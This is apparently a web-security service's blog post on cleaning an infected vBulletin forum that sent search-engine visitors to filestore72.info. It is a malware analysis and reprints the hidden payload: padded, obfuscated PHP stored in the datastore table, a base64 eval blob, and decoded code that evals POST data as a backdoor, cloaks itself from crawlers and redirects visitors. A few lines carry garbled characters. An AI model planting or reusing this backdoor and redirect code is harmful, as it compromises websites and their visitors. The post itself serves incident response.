Contact us now
+38 (095) 7990080

vBulletin wired infection case (filestore72.info redirection)

April 25, 2018 - Posted by: - In category: Uncategorized - No responses

Problem

site redirects to filestore72.info when visiting it from Google

Investigation

  1. Visit web site from google search results, notice redirection issue
  2. From browser console we can see that issue caused by following script: 
    <script type="text/javascript" src="http://example.org/clientscript/vbulletin-core.js?v=425"></script>
<script type="text/javascript" src="http://example.org/misc.php?v=425&js=js"></script>
...

    with following content

    document.location='http://filestore72.info/download.php'

     

  3. Make same request using Fiddler2 or any similar tool to index script, notice the same stable and infected content
  4. For output of this code responsible script “includes/class_core.php” at line #4684 
    eval($template_code);

     

  5. Let’s make some debug output before eval like this: 
    if (isset($_GET['test'])) echo "<pre>$template_code</pre>";

     

  6. Run request once more in Fiddler2, notice some debug output like this: 
    <script type="text/javascript" src="' . $vboptions['bburl'] . '/clientscript/vbulletin-core.js?v=' . $vboptions['simpleversion'] . '"></script>
    ' . $template_hook['headinclude_javascript'] . '

     

  7. Notice suspicious variable “$template_hook[‘headinclude_javascript’]”
  8. Search over DB dump for a suspicious variabe and notice how it is overrided in “datastore” table

     $template_hook[”headinclude_javascript”] .= ”<script type=”text/javascript”>PATHS.blog = “” . htmlspecialchars_uni($vbulletin->options[”vbblog_url”]) . ””;</script>”;\r\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n$pt = ”babe56042d43ad843163a10c83466377”;\r\n$arrvb = ”30m%D2zm93h[,V3kRV3D>/e=>K%omJ=A+g}]*K%lEC+8zlX6m”=ogKJ[mgX6kB4jk7j<3Bq&E.VjmgX?zC)_gKJBkl=BkBk9T.jf>/eR>K&0+8=%k]>0k]T]#bL<*|8<+Or<k|X%V.4jg8~Nw8qz>/~6g7j<+g+rz.rO;gX%Xvq^+CJvzKq%E/X6k%=Bz|}&TB4jg8~Nw8qz>/~6g7j<En9jVn8Lk/>%+8=Q;gqvm.4]1K>0V/&AkC%j+g>x;|>rVK&xkK&8k]~x3″)o+CJ[1Kj]#.q^w6J7JjJ7″BV1J)q}g8JnqJ>^}wV)n%}]g7jf>/T=}/~rk]X%g|JBz.4jg8X)w%+)w%9]7)qww)=7qw+)wjJ7>86<*Bq6NwLjk89]mC=AV.VV*BqBNw~?klJ]gK8rVCXRE.kvzC%K+J?o;K=Q^CV0zKV9+J?o^/%rmC=0g._x;l%o+B_vzK8x3″)o+CJ[g._BVg&B;”8OzCJBg._BVg&O;”%jVJ?o^C+r;KJOzK=!g._xm”_AVC)]kl)Qg._xVC%o3gJBz)?o^C><V)?oz/jvm7k9>/}<^/?jVb6=>|}o;Kx]*BqRNwLjg8X)w%+)w%9]7)qww)=1n8Xw>86f>/L=}eXNn6Q>qJ=}wjJC7J4f>Ce=})q17JX^w6X77J~wNn6=>K8<kKT]*BqvN7q?#OV9;gX6Vl%Amg}]*BqoN7q?#OV9;”_]gK%j>A9j3n8Lz|>jEe+>neJ^JjJ7w6%NnOj:kr!D[|Z:Xnef>/R=+”8?V/jR>)=nqJ>”qJ>z>6rwJ)~^”)=Xn8R]g7jf>CR=>A&A;|><k/}4V/%?+n6OVCJ[V.=I;g+rkKXBmg~61O~AklT=1Oko>/+OV”&9+gq<zO6:kr!D[|Z:z|~6m”=ok89];l>8kl?]g7[]#K8<kKTokCr?N|;=>B[jVl>8zC&%VC%o#n_0k/q<zK_A”BVAm”8?zCJK+g>Am”=o>86o>B+rzgLfm]T=m]TONv?0kKXBmg~6NOkfm”;R+”8?V/jR>)=bn6=#7wJz>C_VE7%fm”;R>Cel>l%AkKJ6E.q^q6Jw”BVK>86<>O;RmgXA+g}R>)=/qJqz>K<A>86<E7;lE.)%zg~6374jg6XNn6Q>qJ9j;86<E7%fm”;R>/}=N7qREgQ<+O4j3O%A+gqvzK=!m”wR>C[9>KJo>B&6m”8%E.j!TA;?TbL<*BqQNgX8;]X6kOrQ+bwR>C4<#bL9*.jfk/><z]}R1lq0;|JQ+”_6#l&0;K)6m”=oN7VRV/q?*Ox0+l%9+gX6z|>%XA1om”_lzB=jz|VozC=r+._?m/L:kr!D[fZ:m”}=3BqQ^7kOEnQ=+gr<VbQ=m”;RE.ejV7jl>OqBEgQ<+O4j37%f>eVTn6>~n)Xz>|q%zg~9;gq%gKr0zK9]gJ9]mCJr+C%o;K&8+CJ^ml)K;gXvkl%?V.VV#v6jmvQ=+”&A+g9jq6&N}j)Tw89]k|q_zCw]gJ9];|XA>86oN7qI*|8=^}ZZ`”;\r\n$ajx = ”:eMx(UPoYL}O`I5&@|=XQ^sp4~1Tt*./+2>9j”7AmgKv#rZy8!Vwd[kqicnS6NhzD-a$R;ulF3,BG{?JWfCEb%]H0)_<”;\r\n$ajx2 = ”.E[8/~?u#AQi;q-x|39Ntf&<gBIM,OCHZ@JskWSzaX2jLh)+1rdU`4cR:=T>0P6b($”%oY!m{e_y}]wV*7GKDln^vF5p”;\r\n$baseline = ”%s%”.substr($arrvb, 733, 1);\r\n$gpu = preg_replace($baseline, strtr($arrvb, $ajx, $ajx2), ”vbseo”);\r\n

  9. Let’s simulate this suspicious PHP code and output it:

    eval(@base64_decode(JHE9J2luaV9zZXQnO2lmKGZ1bmN0aW9uX2V4aXN0cygkcSkpeyRxKCdkaXNwbGF5X2Vycm9ycycsMCk7JHEoJ2xvZ19lcnJvcnMnLDApO31pZihpc3NldCgkX1BPU1RbJHB0XSkpZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yb3QxMygkX1BPU1RbJHB0XSkpKTskdT1AcHJlZ19tYXRjaCgnI2JvdHxzcGlkZXJ8Y3Jhd2x8c2x1cnB8eWFuZGV4I2knLCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSk7JHM9QHBhcnNlX3VybCgkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10pOyR0PUAkc1snaG9zdCddOyRyPUBwcmVnX21hdGNoKCcjbGl2ZVwuY29tfGdvb2dsZVwufHlhaG9vXC58YmluZy5jb218eWFuZGV4XC5ydXxyYW1ibGVyXC5ydXxiYWlkdVwufGZhY2Vib29rXC58aW5zdGFncmFtXC58dGlueXVybFwufGJpdFwubHkjaScsJHQpfHwkdD09J3QuY28nOyRoPUAkX1NFUlZFUlsnSFRUUF9IT1NUJ107JHA9QENPT0tJRV9QUkVGSVg7JGE9QFRISVNfU0NSSVBUPT09J21pc2MnOyRjPSRwLidsYXN0dmlzaXQnOyRuPSRwLidsYW5nX2lkJzskeT1Ab3JkKEZJTEVfVkVSU0lPTik.chr(43).NTE7JHo9ZW1wdHkoJF9TRVJWRVJbJ0hUVFBfWF9NT1onXSk7JGo9JzxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBzcmM9IicuJHZidWxsZXRpbi0.chr(43).b3B0aW9uc1snYmJ1cmwnXS4nL21pc2MucGhwP3Y9Jy4kdmJ1bGxldGluLT5vcHRpb25zWydzaW1wbGV2ZXJzaW9uJ10uJyZhbXA7anM9anMiPjwvc2NyaXB0Pic7aWYoZW1wdHkoJF9DT09LSUVbJG5dKSl7aWYoJGEmJmlzc2V0KCRfR0VUWyd2J10pJiYoaXNzZXQoJF9HRVRbJ2pzJ10pKSYmKCFlbXB0eSgkX0NPT0tJRVskY10pKSl7aWYoJHQ9PSRoKXtpZigkeilzZXRjb29raWUoJG4sJ2VuJyx0aW1lKCkrMzYwMDApOyRtPXN1YnN0cihtZDUoJGgpLDAsOCk7cHJpbnQoImRvY3VtZW50LmxvY2F0aW9uPSdodHRwOi8vZmlsZXN0b3JlNzIuaW5mby9kb3dubG9hZC5waHA.chr(47).aWQ9eyRtfSciKTt9ZXhpdDt9aWYoKCEkdSkmJiRyKXtpZigkeSl7JEdMT0JBTFNbJ3RlbXBsYXRlX2hvb2snXVsnaGVhZGluY2x1ZGVfamF2YXNjcmlwdCddLj0kajt9ZWxzZXskR0xPQkFMU1snc3R5bGUnXVsnY3NzJ10uPSRqO319fQ));

  10. Let’s decode this suspicious base64 content:

    $q=’ini_set’;if(function_exists($q)){$q(‘display_errors’,0);$q(‘log_errors’,0);}if(isset($_POST[$pt]))eval(base64_decode(str_rot13($_POST[$pt])));$u=@preg_match(‘#bot|spider|crawl|slurp|yandex#i’,$_SERVER[‘HTTP_USER_AGENT’]);$s=@parse_url($_SERVER[‘HTTP_REFERER’]);$t=@$s[‘host’];$r=@preg_match(‘#live\.com|google\.|yahoo\.|bing.com|yandex\.ru|rambler\.ru|baidu\.|facebook\.|instagram\.|tinyurl\.|bit\.ly#i’,$t)||$t==’t.co’;$h=@$_SERVER[‘HTTP_HOST’];$p=@COOKIE_PREFIX;$a=@THIS_SCRIPT===’misc’;$c=$p.’lastvisit’;$n=$p.’lang_id’;$y=@ord(FILE_VERSION)†¾751;$z=empty($_SERVER[‘HTTP_X_MOZ’]);$j='<script type=”text/javascript” src=”‘.$vbulletin-†¾7options[‘bburl’].’/misc.php?v=’.$vbulletin->options[‘simpleversion’].’&amp;js=js”></script>’;if(empty($_COOKIE[$n])){if($a&&isset($_GET[‘v’])&&(isset($_GET[‘js’]))&&(!empty($_COOKIE[$c]))){if($t==$h){if($z)setcookie($n,’en’,time()+36000);$m=substr(md5($h),0,8);print(“document.location=’http://filestore72.info/download.php†¾;id={$m}'”);}exit;}if((!$u)&&$r){if($y){$GLOBALS[‘template_hook’][‘headinclude_javascript’].=$j;}else{$GLOBALS[‘style’][‘css’].=$j;}}}

  11. Beautified code: 
    <?php
$q = 'ini_set';

if (function_exists($q))
	{
	$q('display_errors', 0);
	$q('log_errors', 0);
	}

if (isset($_POST[$pt])) eval(base64_decode(str_rot13($_POST[$pt])));
$u = @preg_match('#bot|spider|crawl|slurp|yandex#i', $_SERVER['HTTP_USER_AGENT']);
$s = @parse_url($_SERVER['HTTP_REFERER']);
$t = @$s['host'];
$r = @preg_match('#live\.com|google\.|yahoo\.|bing.com|yandex\.ru|rambler\.ru|baidu\.|facebook\.|instagram\.|tinyurl\.|bit\.ly#i', $t) || $t == 't.co';
$h = @$_SERVER['HTTP_HOST'];
$p = @COOKIE_PREFIX;
$a = @THIS_SCRIPT === 'misc';
$c = $p . 'lastvisit';
$n = $p . 'lang_id';
$y = @ord(FILE_VERSION) †¾751;
$z = empty($_SERVER['HTTP_X_MOZ']);
$j = '<script type="text/javascript" src="' . $vbulletin - †¾7options['bburl'] . '/misc.php?v=' . $vbulletin->options['simpleversion'] . '&amp;js=js"></script>';

if (empty($_COOKIE[$n]))
	{
	if ($a && isset($_GET['v']) && (isset($_GET['js'])) && (!empty($_COOKIE[$c])))
		{
		if ($t == $h)
			{
			if ($z) setcookie($n, 'en', time() + 36000);
			$m = substr(md5($h) , 0, 8);
			print ("document.location='http://filestore72.info/download.php†¾;id={$m}'");
			}

		exit;
		}

	if ((!$u) && $r)
		{
		if ($y)
			{
			$GLOBALS['template_hook']['headinclude_javascript'].= $j;
			}
		  else
			{
			$GLOBALS['style']['css'].= $j;
			}
		}
	}
  12. That is root cause redirection issue for target site.
  13. Remove infected PHP part from DB starting from “\n\n\n\n” and finishing by “‘vbseo”);\r\n”. You have to fix length of this string right before it’s declaration, something like this: 
    s:311:"...
  14. Site is clean. Enjoy.